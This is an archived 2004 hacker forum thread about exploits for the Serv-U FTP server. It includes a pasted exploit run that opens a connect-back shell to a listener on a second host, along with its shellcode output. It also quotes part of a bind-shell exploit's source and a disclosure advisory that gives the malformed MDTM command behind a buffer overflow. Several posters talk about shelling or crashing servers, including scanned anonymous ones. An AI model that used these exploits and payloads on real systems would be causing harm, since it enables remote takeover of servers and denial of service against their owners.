ill check this one out, the others just seem to kill the serv-u all together. Hope this one shells a little better.
Reclone
Jan 28 2004, 01:44 PM
Just tested this one. Luckily it just kills servu
Krogoth
Jan 28 2004, 02:24 PM
yes, seen that on k-otik. gonna check this out.
studnikov
Jan 28 2004, 09:01 PM
Checked on one of my own servers running Ser-v 4.1 Pro:
C:\cygwin\home\>a -d ***.56.***.65 -p 22 -u **** -s ***** -w c:\ -H ***. 13.***.105 -P 8888 [%] Serv-u v4.1.0.0 exploit [%] /sbin/ifconfig: not found grep: not found gawk: not found [.] if working you'll have a shell on ***.13.***.105:8888. [.] launching attack on ftp://****:*****@***.56.***.65:22c:\ [.] setting up listener on port 8888.. [+] logged in. [+] sending exploit.. 550 /c:/???????????????????????????????????????????????????????????????????????? ???????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????3A♦¶hâúAIh?6-FPh<4$1ÿOòñ↓?--(nåÉ-_¥☼--_áå☼ÉA ifââÉ-☺ ÄÄÄÄOÄOÄ~?---AÅxÅùoyóâx-Ai?iF♣_N>Zÿ_"-'.↔Rü+Æ: No such file or directory . C:\cygwin\home\>
Black Flag
Jan 30 2004, 01:16 AM
you need a writable directory...
phaeton
Jan 30 2004, 01:18 AM
did anyone actually get any of these to work? all the ones i have just crash servu
if (argc<5) { printf("Usage: %s IP PORT USERNAME PASSWORD [DIRECTORY]\n", argv[0]); exit(-1); }
printf("- Serv-ME ----------------------------------------------------\n" " Serv-U v4.x \"site chmod\" exploit.\n" " Written by SkyLined <SkyLined@EduP.TUDelft.nl>.\n" " Credits for the vulnerability go to ICBM <icbm@0x557.net>.\n" " Thanks to H D Moore for the shellcode (www.metasploit.com).\n" " Greets to everyone at 0dd and #netric.\n" " (K)(L)(F) for Suzan.\n" "\n" " Binds a shell at %s:28876 if successfull.\n" " Tested with: v4.0.0.4, v4.1.0.0, v4.1.0.3 on W2K-EN.\n" "--------------------------------------------------------------\n", argv[1]);
The Serv-U is a ftp daemon runs on windows. Serv-U supports a ftp command "MDTM" for user changing file time . There is a buffer overflow when a user logged in and send a malformed time zone as MDTM argument. This can be remote exploit and gain SYSTEM privilege.
Exploit:
When a user logged in, he can send this MDTM 20031111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /test.txt You must have a valid user account and password to exploit it, and you are not need WRITE or any other privilege. And even the test.txt,which is the file you request, can not be there. :) So you can put your shellcode as the filename.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
x1`
Feb 26 2004, 05:27 PM
so will this work with the anonymous ones and would u type anonymous anonymous for login and pass
brOmstar
Feb 26 2004, 05:30 PM
u need a valid account but this shouldn't be the problem with serv-U =)
Arnie
Feb 26 2004, 05:37 PM
aint this just a DoS ? well it crashed my serv-u but obviously with that command you wont get a shell
brOmstar
Feb 26 2004, 05:41 PM
???
QUOTE
This can be remote exploit and gain SYSTEM privilege. ..... So you can put your shellcode as the filename.
Must be a remote exploitable one with possibility to insert shell i think
cecrex
Feb 26 2004, 11:01 PM
this shit just crashes the FTP.. is there any other version that works well?
nutschi
Feb 26 2004, 11:21 PM
and how can u protect yer servu now :|
WeeDMoNKeY
Feb 26 2004, 11:30 PM
i noticed this to, peopel would jsut scan for anonymous ftp's with serv-u running, can be some massive havok happening.. its pretty simple actually, very god advisory.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
mucho thx Gurou will try it and give feedback 
